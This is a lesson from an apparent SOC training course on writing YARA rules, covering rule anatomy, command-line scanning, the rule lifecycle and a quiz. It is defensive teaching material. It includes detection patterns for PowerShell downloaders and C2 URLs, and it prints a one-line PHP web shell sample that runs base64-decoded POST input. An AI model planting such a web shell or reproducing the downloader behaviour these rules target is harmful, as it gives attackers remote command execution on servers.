Lesson 1 of 6 · 13 min read · Includes quiz

YARA Fundamentals

Meta, strings, condition

What You'll Learn

  • Explain what YARA is and why SOC analysts use it to detect malware, webshells, and suspicious files
  • Identify the three sections of a typical YARA rule (meta, strings, and condition) and recognize that only condition is mandatory
  • Write a basic YARA rule that detects a file containing specific text, hex, and regex patterns
  • Run YARA from the command line to scan a single file and a directory
  • Describe the YARA rule lifecycle from discovery through deployment and maintenance
  • Connect YARA fundamentals to the hands-on exercises in Lab 7.1

What Is YARA and Why Does It Matter?

Every SOC analyst eventually encounters a question no SIEM alert can answer on its own: "Is this file malicious?" A Wazuh alert tells you that a suspicious file appeared on an endpoint. Suricata tells you that a binary was downloaded over HTTP. MISP tells you that a hash matches a known malware family. But none of these tools can look inside an arbitrary file and tell you what patterns it contains, what strings are embedded in it, or whether its structure matches a known threat signature.

That is what YARA does.

YARA is a pattern-matching tool designed specifically for malware detection and classification. Created by Victor Alvarez at VirusTotal, it lets you write rules that describe textual, hexadecimal, and regex patterns found in files. When you run YARA against a file or directory, it checks every file against your rules and reports matches. Think of YARA rules as custom signatures — you define exactly what you are looking for, and YARA finds it.

Here is what makes YARA indispensable in SOC operations:

| Use Case | How YARA Helps |
| --- | --- |
| Malware detection | Write a rule for a known malware family's unique strings. Scan uploads, downloads, and quarantine folders. |
| Webshell hunting | Write rules for common webshell indicators (eval, base64_decode, cmd.exe). Scan entire web directories to find planted shells. |
| Incident response | During an active investigation, write a rule for the attacker's tools and scan the affected endpoint to find all instances. |
| Threat hunting | Deploy YARA rules across your fleet via Velociraptor to proactively search for indicators before alerts fire. |
| File classification | Categorize files by type: is this a PE executable? A PDF with embedded JavaScript? An Office document with macros? |
| Indicator operationalization | When threat intel provides IOCs like file hashes, strings, or byte patterns, convert them into YARA rules for automated scanning. |

YARA is used by antivirus companies, CERT teams, threat intelligence platforms (including MISP and VirusTotal), and incident responders worldwide. The 523+ YARA rules pre-installed on CyberBlueSOC at /opt/yara-rules/ were written by the security community to detect everything from commodity ransomware to nation-state APT tools.

YARA is not an antivirus. It does not run in the background monitoring files in real time. It is a scanning tool that you point at targets on demand. You write rules, you run scans, you review results. This makes YARA flexible (you can scan anything — files, directories, memory dumps, disk images) but also means it requires analyst skill to use effectively. The quality of your detection depends entirely on the quality of your rules.

Anatomy of a YARA Rule

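Most YARA rules follow the same structure, built from three sections: meta, strings, and condition. Only condition is strictly required (meta and strings are optional), but nearly every practical rule uses all three. Once you master this structure, you can read and write most of the rules you will encounter.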

Figure: YARA rule anatomy. The three sections are meta (who and why), strings (what to look for), and condition (the logic that triggers).

Here is a complete YARA rule with all three sections:

rule Detect_Malicious_Script
{
    meta:
        author = "CyberBlue Academy"
        description = "Detects a PowerShell downloader script"
        date = "2026-02-17"
        reference = "https://cyberblue.academy/module-7"
        severity = "high"

    strings:
        $download = "DownloadString" nocase
        $iex = "Invoke-Expression" nocase
        $webclient = "Net.WebClient" nocase
        $hidden = "-WindowStyle Hidden" nocase
        $encoded = "-enc" nocase

    condition:
        filesize < 100KB and
        3 of them
}

Let us break down each section.

Section 1: meta

The meta section contains descriptive information about the rule. It has zero effect on matching — YARA ignores it during scanning. But it is critical for rule management:

| Field | Purpose | Example |
| --- | --- | --- |
| author | Who wrote the rule | "SOC Team - CyberBlue" |
| description | What the rule detects | "PowerShell downloader using Net.WebClient" |
| date | When the rule was created or last updated | "2026-02-17" |
| reference | Threat report, blog post, or sample hash | "https://example.com/report-123" |
| severity | How critical a match is | "critical", "high", "medium", "low" |
| hash | SHA256 of the original sample | "a1b2c3d4e5f6..." |
| mitre_att_ck | ATT&CK technique ID | "T1059.001" |
| tlp | Traffic Light Protocol marking | "TLP:GREEN" |

Good metadata makes rules maintainable. When you have 500+ rules and one starts producing false positives, the author, date, and reference fields help you trace why the rule was created and whether it is still relevant.
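Because meta fields are plain key/value pairs, they are easy to pull out for an inventory or audit. The following is a minimal Python sketch, assuming every meta entry is a string written as key = "value" on its own line. The helper name extract_meta is hypothetical, and this line-based approach is not a full YARA parser.

```python
import re

# Hypothetical helper: pull string-valued meta fields out of rule text.
# Assumes each meta entry sits on its own line as: key = "value"
META_LINE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')

def extract_meta(rule_text: str) -> dict:
    meta = {}
    in_meta = False
    for line in rule_text.splitlines():
        stripped = line.strip()
        if stripped == "meta:":
            in_meta = True
            continue
        if stripped in ("strings:", "condition:"):
            in_meta = False          # the meta section has ended
        if in_meta:
            m = META_LINE.match(line)
            if m:
                meta[m.group(1)] = m.group(2)
    return meta

RULE = '''
rule Detect_Malicious_Script
{
    meta:
        author = "CyberBlue Academy"
        date = "2026-02-17"
        severity = "high"

    strings:
        $download = "DownloadString" nocase

    condition:
        $download
}
'''

print(extract_meta(RULE))
# {'author': 'CyberBlue Academy', 'date': '2026-02-17', 'severity': 'high'}
```

Run over a whole rule directory, a helper like this could list every rule older than a given date or missing an author, which is the kind of tracing described above.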

Section 2: strings

The strings section defines the patterns YARA looks for inside files. Every string variable starts with a $ sign. You can define three types of strings:

Text strings — human-readable strings found in the file:

$download = "DownloadString"
$url = "http://malware.example.com/payload"
$cmd = "cmd.exe /c"

Hex strings — raw byte sequences in curly braces:

$mz_header = { 4D 5A 90 00 }
$http_prefix = { 68 74 74 70 3A 2F 2F }   // ASCII bytes for "http://"
$call_ret = { E8 ?? ?? ?? ?? C3 }

The ?? in hex strings are wildcards — they match any byte value. This is essential for detecting shellcode where certain bytes (like offsets) change between samples.
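To see what the wildcard buys you, here is a small Python sketch that imitates the $call_ret pattern by translating it into a bytes regex. It only handles plain bytes and ??, the sample byte sequences are invented for illustration, and YARA's own matcher works differently internally.

```python
import re

def hex_pattern_to_regex(pattern: str):
    """Translate a simple YARA-style hex string (plain bytes and ?? only) into a bytes regex."""
    parts = []
    for token in pattern.split():
        if token == "??":
            parts.append(b".")                                # any single byte
        else:
            parts.append(re.escape(bytes([int(token, 16)])))  # one literal byte
    # DOTALL so that "." also matches the newline byte 0x0A
    return re.compile(b"".join(parts), re.DOTALL)

call_ret = hex_pattern_to_regex("E8 ?? ?? ?? ?? C3")

sample_a = b"\x90\x90\xE8\x10\x00\x00\x00\xC3"   # E8, four offset bytes, C3
sample_b = b"\x90\x90\xE8\xFF\x0A\x22\x01\xC3"   # same shape, different offset bytes
sample_c = b"\x90\x90\xE8\x10\x00\x00\xC3"       # only three bytes between E8 and C3

for name, data in [("a", sample_a), ("b", sample_b), ("c", sample_c)]:
    m = call_ret.search(data)
    print(name, hex(m.start()) if m else None)
# a 0x2
# b 0x2
# c None
```

Samples a and b differ in the four offset bytes but both match, while sample c fails because each ?? must consume exactly one byte.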

Regular expressions — pattern matching with regex:

$ip_pattern = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/
$base64_blob = /[A-Za-z0-9+\/]{50,}={0,2}/
$c2_url = /https?:\/\/[a-z0-9\-\.]+\.(ru|cn|tk)\/[a-z]{5,}/

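You can combine all three types in a single rule. Mixing types lets a rule key on several independent traits of a sample (a readable string, a byte sequence, a variable pattern), which usually makes detection more precise than relying on any single pattern.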
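Before putting a regex into a rule, it can help to prototype it against sample text. The sketch below reuses two of the expressions above in Python. Python's re engine is not YARA's engine, so treat this as a prototyping aid only, and note that the sample content is invented for illustration.

```python
import re

# Same expressions as in the rule, without YARA's surrounding / delimiters
ip_pattern = re.compile(rb"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")
c2_url = re.compile(rb"https?:\/\/[a-z0-9\-\.]+\.(ru|cn|tk)\/[a-z]{5,}")

# Hypothetical script content
sample = b"$c = 'http://update-cdn.example.tk/payload'; ping 192.0.2.15"

print(c2_url.search(sample).group())      # b'http://update-cdn.example.tk/payload'
print(ip_pattern.search(sample).group())  # b'192.0.2.15'

# The IP pattern does not validate octet ranges, so it also hits non-addresses
print(ip_pattern.search(b"build 999.999.999.999").group())  # b'999.999.999.999'
```

The last line shows why a regex like $ip_pattern is better used alongside other strings than as the only trigger for a match.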

Section 3: condition

The condition section defines the logic that determines whether a file matches the rule. This is where the real power lies:

condition:
    filesize < 100KB and 3 of them

This means: the file must be smaller than 100KB and at least 3 of the defined strings must be present. Common condition patterns:

| Condition | What It Means |
| --- | --- |
| all of them | Every defined string must be present |
| any of them | At least one string must be present |
| 3 of them | At least 3 strings must be present |
| 2 of ($download*, $iex*) | At least 2 strings whose names start with $download or $iex |
| $download and $iex | Both specific strings must be present |
| filesize < 1MB | File size must be under 1MB |
| uint16(0) == 0x5A4D | First two bytes must be MZ (PE executable) |
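The uint16(0) check can look backwards at first: the file starts with the bytes 4D 5A ("MZ"), yet the condition compares against 0x5A4D. That is because uint16 reads the two bytes as a little-endian integer. A short Python sketch of the same read (the helper name uint16_at and the sample bytes are illustrative):

```python
import struct

def uint16_at(data: bytes, offset: int) -> int:
    """Read an unsigned 16-bit little-endian integer, as YARA's uint16(offset) does."""
    return struct.unpack_from("<H", data, offset)[0]

pe_like = b"MZ\x90\x00" + b"\x00" * 60   # starts with bytes 4D 5A
script = b"#!/bin/sh\necho hello\n"

print(hex(uint16_at(pe_like, 0)))        # 0x5a4d
print(uint16_at(pe_like, 0) == 0x5A4D)   # True
print(uint16_at(script, 0) == 0x5A4D)    # False
```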

The filesize check is one of the most important tools for reducing false positives. If you are looking for a malicious script, limiting to filesize < 100KB eliminates large binaries, databases, and log files from consideration.

The condition section is mandatory and must evaluate to true for a match. A common beginner mistake is writing great strings but a condition that is too loose (any of them) or too strict (all of them). Start with a moderate condition like 2 of them or 3 of them and adjust based on testing. Too loose = false positives. Too strict = missed detections.
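To make the loose-versus-strict trade-off concrete, the following Python sketch imitates the condition of Detect_Malicious_Script with an adjustable threshold. It is a simplified stand-in for YARA (plain substring checks, lowercase comparison in place of nocase), and both sample inputs are invented.

```python
PATTERNS = {
    "$download": b"DownloadString",
    "$iex": b"Invoke-Expression",
    "$webclient": b"Net.WebClient",
    "$hidden": b"-WindowStyle Hidden",
    "$encoded": b"-enc",
}

def count_matching(data: bytes) -> int:
    """Count how many patterns occur at least once, ignoring case (like nocase)."""
    lowered = data.lower()
    return sum(1 for p in PATTERNS.values() if p.lower() in lowered)

def rule_matches(data: bytes, minimum: int = 3, max_size: int = 100 * 1024) -> bool:
    # Mirrors: filesize < 100KB and <minimum> of them
    return len(data) < max_size and count_matching(data) >= minimum

downloader = (b"powershell -windowstyle hidden "
              b"(New-Object Net.WebClient).downloadstring('http://example.com/a')")
admin_script = b"Invoke-Expression $localCommand"

print(rule_matches(downloader))                # True  (3 of them)
print(rule_matches(downloader, minimum=5))     # False (all of them is too strict)
print(rule_matches(admin_script, minimum=1))   # True  (any of them is too loose)
print(rule_matches(admin_script))              # False (3 of them)
```

With the moderate threshold, the downloader is caught and the harmless admin script is not; moving the threshold in either direction breaks one of the two.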

The YARA Rule Lifecycle

Writing a YARA rule is not a one-shot activity. Professional rule development follows a lifecycle that ensures rules are accurate, tested, and maintained over time.

Figure: YARA rule lifecycle, from discovering a new sample through analysis, rule writing, testing, deployment, and ongoing maintenance.

Stage 1 — Discover: You encounter a new threat. This could be a malware sample from an incident response engagement, a suspicious file flagged by an analyst, or indicators from a threat intelligence report. The trigger is always the same: you need a way to detect this threat across your environment.

Stage 2 — Analyze: Before writing a rule, you need to understand the target. Use tools like strings (extract readable text), hexdump (view raw bytes), CyberChef (decode and transform), and sandbox reports (understand behavior). Your goal is to find unique, stable patterns — strings or byte sequences that appear in the malicious sample but not in legitimate software.

Stage 3 — Write: Craft your YARA rule with multiple string types, a file format check, a size constraint, and a flexible condition. Use the meta section to document what you are detecting and why.

Stage 4 — Test: Run your rule against two corpora: a set of known-bad samples (to verify detection) and a set of known-good files (to verify zero false positives). The goal is 100% true positive rate and 0% false positive rate on your test sets. In reality, you may need to iterate between writing and testing multiple times.
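The Stage 4 bookkeeping can be sketched in a few lines of Python. This assumes you have already collected the set of file paths your rule matched; the function name detection_rates and all file names are hypothetical.

```python
def detection_rates(matched: set, known_bad: set, known_good: set) -> dict:
    """Summarize a test run against a known-bad and a known-good corpus."""
    true_pos = matched & known_bad
    false_pos = matched & known_good
    return {
        "tp_rate": len(true_pos) / len(known_bad),
        "fp_rate": len(false_pos) / len(known_good),
        "missed": sorted(known_bad - matched),
        "false_positives": sorted(false_pos),
    }

known_bad = {"bad/stage1.ps1", "bad/stage2.ps1", "bad/loader.ps1", "bad/variant_b.ps1"}
known_good = {"good/backup.ps1", "good/deploy.ps1", "good/inventory.ps1",
              "good/patch.ps1", "good/report.ps1"}
matched = {"bad/stage1.ps1", "bad/stage2.ps1", "bad/loader.ps1", "good/deploy.ps1"}

report = detection_rates(matched, known_bad, known_good)
print(report["tp_rate"], report["fp_rate"])   # 0.75 0.2
print(report["missed"])                       # ['bad/variant_b.ps1']
print(report["false_positives"])              # ['good/deploy.ps1']
```

The missed and false_positives lists tell you which files to inspect before the next write-and-test iteration.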

Stage 5 — Deploy: Push your tested rule to production scanning infrastructure. This could be Velociraptor (endpoint hunting), your CI/CD pipeline (scanning code deployments), an email gateway (scanning attachments), or a file upload scanner (scanning user uploads).

Stage 6 — Maintain: Rules are not permanent. Monitor for false positives in production. When new variants of the malware appear, update your rule to catch them. When the threat is no longer active, consider retiring the rule to keep your rule set lean. Schedule periodic reviews (quarterly is common in mature SOCs).

💡 Tip: Start your YARA journey with detection, not perfection. Your first rules will not be as elegant as the 523+ community rules. That is expected. Write a rule that catches the sample you are looking at, test it, and deploy it. You will refine your technique with each rule you write. The best YARA rule writers in the industry started exactly where you are now.

Running YARA from the Command Line

YARA is a command-line tool. The basic syntax is:

yara [options] rule_file target

Scan a single file:

yara my_rule.yar suspect.exe

Scan a directory recursively:

yara -r my_rule.yar /uploads/

Show matching strings (critical for debugging):

yara -s my_rule.yar suspect.exe

The -s flag shows which strings matched and at what offset in the file. This is invaluable when debugging why a rule matched (or did not match).

Key flags you will use constantly:

| Flag | Purpose |
| --- | --- |
| -r | Scan directories recursively |
| -s | Print matching strings with offsets |
| -c | Count matches only (no details) |
| -n | Negate: print the rule/file pairs where the rule did NOT match |
| -p N | Use N threads for parallel scanning |
| -w | Suppress warnings |
| --timeout=N | Abort scanning after N seconds |
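If you drive scans from a script, it helps to assemble the command as a list rather than a single string. The sketch below uses only flags from this lesson; the function name build_yara_command is hypothetical, and nothing is executed here.

```python
import shlex

def build_yara_command(rule_file, target, recursive=False, show_strings=False,
                       threads=None, timeout=None):
    """Assemble a yara command line as an argument list."""
    cmd = ["yara"]
    if recursive:
        cmd.append("-r")
    if show_strings:
        cmd.append("-s")
    if threads is not None:
        cmd += ["-p", str(threads)]
    if timeout is not None:
        cmd.append(f"--timeout={timeout}")
    cmd += [rule_file, target]      # rule file first, then the scan target
    return cmd

cmd = build_yara_command("my_rule.yar", "/uploads/",
                         recursive=True, show_strings=True, threads=4)
print(shlex.join(cmd))   # yara -r -s -p 4 my_rule.yar /uploads/
```

On a host where yara is installed, the list could be passed to subprocess.run(cmd, capture_output=True, text=True). Passing a list avoids shell-quoting problems when paths contain spaces.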

Example output with -s flag:

$ yara -s detect_downloader.yar /samples/
Detect_Malicious_Script /samples/stage1.ps1
0x42:$download: DownloadString
0x8a:$webclient: Net.WebClient
0xc1:$hidden: -WindowStyle Hidden

This tells you the rule Detect_Malicious_Script matched the file /samples/stage1.ps1. Three strings matched: $download was found at byte offset 0x42, $webclient at 0x8a, and $hidden at 0xc1.
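When you scan many files, you may want this output in a structured form. Here is a minimal Python parser sketch, assuming the output looks exactly like the example above (a "rule path" line followed by "offset:$name: data" lines). The function name parse_yara_s_output is hypothetical.

```python
import re

# Matches lines such as: 0x42:$download: DownloadString
STRING_LINE = re.compile(r"^(0x[0-9a-fA-F]+):(\$\w*): (.*)$")

def parse_yara_s_output(text: str) -> list:
    results = []
    current = None
    for line in text.splitlines():
        m = STRING_LINE.match(line)
        if m and current is not None:
            # A string hit belonging to the most recent rule/file line
            current["strings"].append(
                {"offset": int(m.group(1), 16), "name": m.group(2), "data": m.group(3)}
            )
        elif line.strip():
            # A new "rule_name file_path" line
            rule, _, path = line.partition(" ")
            current = {"rule": rule, "file": path, "strings": []}
            results.append(current)
    return results

OUTPUT = """Detect_Malicious_Script /samples/stage1.ps1
0x42:$download: DownloadString
0x8a:$webclient: Net.WebClient
0xc1:$hidden: -WindowStyle Hidden
"""

hits = parse_yara_s_output(OUTPUT)
print(hits[0]["rule"], hits[0]["file"])
print([(s["name"], s["offset"]) for s in hits[0]["strings"]])
# Detect_Malicious_Script /samples/stage1.ps1
# [('$download', 66), ('$webclient', 138), ('$hidden', 193)]
```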

Compiling rules for performance:

When you have many rules, you can compile them into a binary format for faster loading:

yarac all_rules.yar compiled_rules.yarc
# -C tells yara the rules file is already compiled (required by current YARA releases)
yara -C compiled_rules.yarc /target/directory/

Compiled rules load significantly faster, which matters when you are scanning large directories with hundreds of rules.

🚨 Warning: Never run YARA rules from untrusted sources without reviewing them first. YARA rules can use the include directive to reference other files, and poorly written regex patterns can cause excessive CPU usage (ReDoS, Regular Expression Denial of Service). Always read the strings and conditions before executing someone else's rule. In a SOC environment, maintain a curated, reviewed rule repository rather than blindly downloading and running rules from the internet.
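A quick pre-review pass can point you at the lines worth reading first. The Python sketch below flags include directives and regex strings with unbounded repetition. It is a rough heuristic written for this lesson, not a substitute for reading the rule, and the function name review_rule_text and the sample rule are hypothetical.

```python
import re

INCLUDE = re.compile(r'^\s*include\s+"([^"]+)"', re.MULTILINE)
# Rough heuristic for a regex string definition such as:  $name = /.../
REGEX_DEF = re.compile(r'^[ \t]*(\$\w*)[ \t]*=[ \t]*/(.+)/', re.MULTILINE)
# Unbounded repetition: .*  .+  or {n,}
UNBOUNDED = re.compile(r"\.\*|\.\+|\{\d+,\}")

def review_rule_text(rule_text: str) -> dict:
    includes = INCLUDE.findall(rule_text)
    risky = [name for name, body in REGEX_DEF.findall(rule_text)
             if UNBOUNDED.search(body)]
    return {"includes": includes, "unbounded_regexes": risky}

UNTRUSTED = r'''
include "other_rules.yar"

rule Example
{
    strings:
        $blob = /[A-Za-z0-9+\/]{50,}={0,2}/
        $ip = /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/
        $txt = "eval("
    condition:
        any of them
}
'''

print(review_rule_text(UNTRUSTED))
# {'includes': ['other_rules.yar'], 'unbounded_regexes': ['$blob']}
```

A flagged regex is not necessarily dangerous; it is simply a pattern to examine and test on large files before the rule goes into your curated repository.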

Your First YARA Rule: Step by Step

Let us write a complete YARA rule from scratch. Imagine you are investigating an incident where the attacker dropped a PHP web shell on a compromised web server. You found the web shell and now want to scan all web servers for similar files.

Step 1 — Analyze the sample. You examine the web shell and find these distinctive patterns:

<?php eval(base64_decode($_POST['cmd'])); ?>

The key indicators are: the eval function, base64_decode, and $_POST (reading user input from an HTTP POST request).

Step 2 — Write the rule:

rule Webshell_PHP_Eval
{
    meta:
        author = "CyberBlue Academy"
        description = "Detects PHP web shells using eval with base64_decode"
        date = "2026-02-17"
        severity = "critical"
        mitre_att_ck = "T1505.003"

    strings:
        $eval = "eval(" nocase
        $b64 = "base64_decode" nocase
        $post = "$_POST" nocase
        $get = "$_GET" nocase
        $request = "$_REQUEST" nocase
        $system = "system(" nocase
        $exec = "exec(" nocase
        $passthru = "passthru(" nocase
        $php_tag = "<?php"

    condition:
        filesize < 50KB and
        $php_tag and
        $eval and
        ($b64 or $system or $exec or $passthru) and
        ($post or $get or $request)
}

Step 3 — Test the rule:

# Test against the known web shell (should match)
yara -s webshell_rule.yar /evidence/webshell.php

# Test against a clean PHP application (should NOT match)
yara -r webshell_rule.yar /var/www/clean_app/

# Count matches across the entire web directory
yara -rc webshell_rule.yar /var/www/

Step 4 — Analyze results. If the rule matches the known web shell and does not match any clean PHP files, it is ready for deployment. If it produces false positives, tighten the condition (require more strings, add additional unique patterns from the web shell sample).

This rule demonstrates several best practices:

  • Multiple text strings covering different web shell techniques
  • File size constraint (< 50KB): web shells are small
  • PHP tag check: only files containing a <?php tag can match
  • Flexible condition: requires eval plus at least one encoding/execution function plus at least one user input source
  • ATT&CK mapping: T1505.003 is "Server Software Component: Web Shell"
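To check your reading of the condition, you can restate it in Python and try it on a few inputs. The sketch below mirrors the boolean structure of Webshell_PHP_Eval using plain substring checks. It is an approximation of YARA's behavior, and the second and third samples are invented for illustration.

```python
def contains(data: bytes, needle: bytes, nocase: bool = True) -> bool:
    if nocase:
        return needle.lower() in data.lower()
    return needle in data

def webshell_rule_matches(data: bytes) -> bool:
    has_exec = any(contains(data, s)
                   for s in (b"base64_decode", b"system(", b"exec(", b"passthru("))
    has_input = any(contains(data, s) for s in (b"$_POST", b"$_GET", b"$_REQUEST"))
    return (
        len(data) < 50 * 1024                       # filesize < 50KB
        and contains(data, b"<?php", nocase=False)  # $php_tag has no nocase modifier
        and contains(data, b"eval(")                # $eval
        and has_exec                                # ($b64 or $system or $exec or $passthru)
        and has_input                               # ($post or $get or $request)
    )

webshell = b"<?php eval(base64_decode($_POST['cmd'])); ?>"
contact_form = b"<?php $name = htmlspecialchars($_POST['name']); echo $name; ?>"
short_tag_shell = b"<? eval(base64_decode($_POST['cmd'])); ?>"

print(webshell_rule_matches(webshell))         # True
print(webshell_rule_matches(contact_form))     # False: no eval(
print(webshell_rule_matches(short_tag_shell))  # False: no <?php tag
```

The third case is worth noting: a shell written with a short open tag would slip past the $php_tag requirement, which is the kind of gap that testing against more samples tends to reveal.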

Key Takeaways

  • YARA is a pattern-matching tool that scans files for text, hex, and regex patterns — it is the analyst's primary tool for custom malware detection
  • A typical YARA rule has three sections: meta (descriptive info), strings (patterns to find), and condition (logic that triggers a match); only condition is mandatory
  • Text strings match human-readable content, hex strings match raw bytes (with wildcards), and regex strings match variable patterns
  • The condition section controls detection precision — filesize checks, uint16 format checks, and flexible counting (2 of them) reduce false positives
  • Professional rule development follows a lifecycle: discover, analyze, write, test, deploy, maintain
  • Key CLI flags: -r (recursive), -s (show matching strings), -c (count only), -p N (parallel threads)
  • In Lab 7.1, you will write your first YARA rule to detect a malicious script hidden among 20 files — and achieve zero false positives

What's Next

You now understand the anatomy of a YARA rule and how to run scans from the command line. In Lesson 7.2, you will dive deep into the strings section — learning modifiers like nocase, wide, fullword, xor, and base64 that make your patterns more flexible and powerful. You will also master hex string wildcards, jumps, and alternation for matching binary signatures that vary between samples.

Knowledge Check: YARA Fundamentals

10 questions · 70% to pass

1. What is the primary purpose of YARA in a SOC environment?
2. Which three sections make up a typical YARA rule, and which one is mandatory?
3. In YARA hex strings, what does the ?? wildcard represent?
4. Which YARA condition would match a file that contains at least 2 of 5 defined strings AND is smaller than 500KB?
5. What is the purpose of the meta section in a YARA rule?
6. Why is the filesize check one of the most important condition elements for reducing false positives?
7. Which YARA command-line flag shows the matching strings and their byte offsets in the scanned file?
8. In Lab 7.1, you will scan 20 files to find a malicious script. If your YARA rule matches the malicious file but also matches 3 clean files, what is the correct next step?
9. In the YARA rule lifecycle, what happens during the 'Test' stage?
10. Which of the following is NOT a valid YARA string type?
